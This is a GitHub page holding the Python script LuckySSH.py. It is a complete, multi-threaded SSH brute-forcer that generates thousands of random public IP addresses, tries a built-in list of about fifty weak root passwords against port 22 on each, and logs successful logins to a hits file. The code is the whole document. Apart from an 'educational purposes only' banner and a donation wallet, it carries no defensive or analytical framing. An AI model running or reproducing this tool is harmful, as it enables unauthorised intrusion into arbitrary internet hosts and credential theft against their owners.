-
Notifications
You must be signed in to change notification settings - Fork 7
/
Copy pathLuckySSH.py
233 lines (204 loc) · 8.56 KB
/
LuckySSH.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
#!/usr/local/bin/python3
#encoding: utf-8
#name: LuckySSH v1
#author: DrPython3 @ GitHub.com
# <<---------------------------------------------------------------------------------------------------------------->>
'''
On a boring Sunday, I decided to write ...
#### [ LuckySSH v1 ] ####
This simple SSH bruteforcer spits out a number on startup, generates that amount of
random IP addresses and tries to find active SSH-services with weak root logins, then.
'''
import random, paramiko, threading, os, sys, time
from random import randint
from time import sleep
import colorama
from colorama import *
init()
print(Fore.WHITE + '')
# <<---------------------------------------------------------------------------------------------------------------->>
'''
+-------------------------+
| Various stuff following |
+-------------------------+
'''
# logo:
logo = '''
___________________________________________________________________________________
.-. .-') .-') .-') ('-. .-.
\ ( OO ) ( OO ). ( OO ). ( OO ) /
,--. ,--. ,--. .-----. ,--. ,--. ,--. ,--.(_)---\_)(_)---\_),--. ,--.
| |.-') | | | | ' .--./ | .' / \ `.' / / _ | / _ | | | | |
| | OO )| | | .-') | |('-. | /, .-') / \ :` `. \ :` `. | .| |
| |`-' || |_|( OO )/_) |OO )| ' _)(OO \ / '..`''.) '..`''.)| |
(| '---.'| | | `-' /|| |`-'| | . \ | / /\_ .-._) \.-._) \| .-. |
| |(' '-'(_.-'(_' '--'\ | |\ \ `-./ /.__) \ /\ /| | | |
`------' `-----' `-----' `--' '--' `--' `-----' `-----' `--' `--'
[[ LuckySSH v1 by DrPython3 @ GitHub.com -+#+- (!) FOR EDUCATIONAL PURPOSES ONLY ]]
Get your lucky number and try your luck on bruteforcing that amount of random IPs
with this little tool ... HITS are saved to the file "hits.txt".
___________________________________________________________________________________
LIKE THIS TOOL? BUY ME A COFFEE OR DONATE, PLEASE!
WALLET (BTC): 19YMv87wkr8K7AJywxqHBrjCs4e8N2ngHT
___________________________________________________________________________________'''
# variables:
lucky_number = 0
checkshit = 0
checksbad = 0
# default timeout for SSH client:
default_timeout = float(5.0)
# amount of attacking threads:
attack_threads = 10
targetips = []
weakwords = [
'root:root','root:toor','root:raspberry','root:test','root:uploader','root:password','root:admin',
'root:administrator','root:marketing','root:12345678','root:1234','root:12345','root:qwerty','root:webadmin',
'root:webmaster','root:maintaince','root:techsupport','root:letmein','root:logon','root:Passw@rd','root:calvin',
'root:qwasyx21','root:default','root:leostream','root:rootpasswd','root:timeserver','root:p@ck3tf3nc3','root:linux',
'root:5up''root:uClinux','root:alpine','root:dottie','root:arcsight','root:unitrends1','root:vagrant','root:fai',
'root:ceadmin','root:palosanto','root:ubuntu1404','root:cubox-i','root:debian','root:xoa','root:sipwise',
'root:sixaola','root:screencast','root:stxadmin','root:nosoup4u','root:indigo','root:video','root:ubnt']
# <<---------------------------------------------------------------------------------------------------------------->>
'''
+--------------------------------------------+
| Functions needed for performing the attack |
+--------------------------------------------+
'''
# clean screen on purpose:
def clean():
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except: pass
# luckynumber() determins the amount of IP addresses to check:
def luckynumber():
X = int(randint(666, 6666))
return X
# ipwriter() saves the random IPs to a file:
def ipwriter(boring):
with open('targets.txt', 'a') as targets:
targets.write(str(boring) + '\n')
targets.close()
# write hits to a file:
def hits(sunday):
with open('hits.txt', 'a') as hitsfile:
hitsfile.write(str(sunday) + '\n')
hitsfile.close()
# ipgen() generates random ip addresses to attack:
def ipgen(bodycount):
print(Fore.WHITE + 'Generating that amount of random IP addresses for you. Please wait (...)\n')
try:
X = int(bodycount)
while X > 0:
# generate 4 random numbers:
r1 = int(randint(1, 255))
r2 = int(randint(0, 255))
r3 = int(randint(0, 255))
r4 = int(randint(1, 255))
randomip = (str(
# combine the 4 random numbers to an IP:
str(r1) + '.' + str(r2) + '.' + str(r3) + '.' + str(r4)
))
# write random IP to file:
ipwriter(str(randomip))
X -= 1
print(Fore.LIGHTGREEN_EX + 'Random IP addresses are ready for an attack now (...)\n')
return True
except:
return False
# countdown() ...yes, it counts down starting with "5":
def countdown():
z = int(5)
while z > 0:
print(Fore.LIGHTYELLOW_EX + '... ' + str(z))
sleep(0.9)
z -= 1
return None
# invader() is the SSH-client the bruter() will use:
def invader(ip, user, passwd):
# configure SSH-client:
invader = paramiko.SSHClient()
invader.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# try to establish a connection:
try:
invader.connect(hostname=str(ip), port=int(22), username=str(user), password=str(passwd), timeout=float(default_timeout))
invader.close()
# in case of successful attack, tell bruter "True":
return True
except:
return False
# bruter() attacks the targets:
def bruter():
global checkshit
global checksbad
global targetips
# start loop:
while len(targetips) > 0:
check_result = False
try:
# get (next) target:
victim = targetips.pop(0)
print(Fore.WHITE + 'Attacking -->> TARGET: ' + str(victim) + ' ...\n')
# start loop to work on userpass-combolist:
for i in weakwords:
# get (next) credentials:
userpass = []
userpass = i.split(':')
user = str(userpass[0])
passwd = str(userpass[1])
# try connection and auth:
check_result = (invader(str(victim), str(user), str(passwd)))
# handle the result:
if check_result == True:
hits(str('HOST: ') + str(victim) + ':22, USER: ' + str(user) + ', PASS: ' + str(passwd))
print(Fore.LIGHTGREEN_EX + '(!) SUCCESS (!) -->> hit on TARGET: ' + str(victim) + '\n')
break
else:
print(Fore.LIGHTRED_EX + '(!) FAIL FOR (!) -->> ' + str(victim) + ':' + str(user) + ':'
+ str(passwd) + ' ...\n')
continue
if check_result == True:
checkshit += 1
else:
checksbad += 1
except:
print(Fore.LIGHTRED_EX + 'Attack on target: ' + str(victim) + ' failed ...\n')
checksbad += 1
continue
# <<---------------------------------------------------------------------------------------------------------------->>
'''
+---------------------------+
| << (!) STARTUP (!) >> |
+---------------------------+
'''
# clean screen and print logo, then:
clean()
print(Fore.LIGHTRED_EX + Style.BRIGHT + logo)
# get lucky number for user, tell about and generate random IPs:
lucky_number = int(luckynumber())
print(Fore.WHITE + '\nYour lucky number is: ' + Fore.LIGHTGREEN_EX + str(lucky_number) + ' ...\n')
generator_status = ipgen(int(lucky_number))
if generator_status == False:
clean()
sys.exit(Fore.LIGHTRED_EX + '\n\n(!) AN ERROR OCCURRED (!) when generating IPs ... sorry, bye!\n\n')
else:
# start the attack:
print(Fore.LIGHTGREEN_EX + 'Starting attack in ...\n')
countdown()
clean()
# fetch random IPs into targetlist:
targetips = open('targets.txt', 'r').read().splitlines()
# start bruter() multi-threaded:
for _ in range(int(attack_threads)):
threading.Thread(target=bruter).start()
# show stats in window title while bruteforce attack is ongoing:
while len(targetips) > 0:
try:
sleep(0.1)
wintitle = str('TO CHECK: ' + str(len(targetips)) + ' | HITS: ' + str(checkshit) + ' | BAD: ' + str(checksbad))
sys.stdout.write('\33]0;' + str(wintitle) + '\a')
sys.stdout.flush()
except: pass
# DrPython3 (C) 2020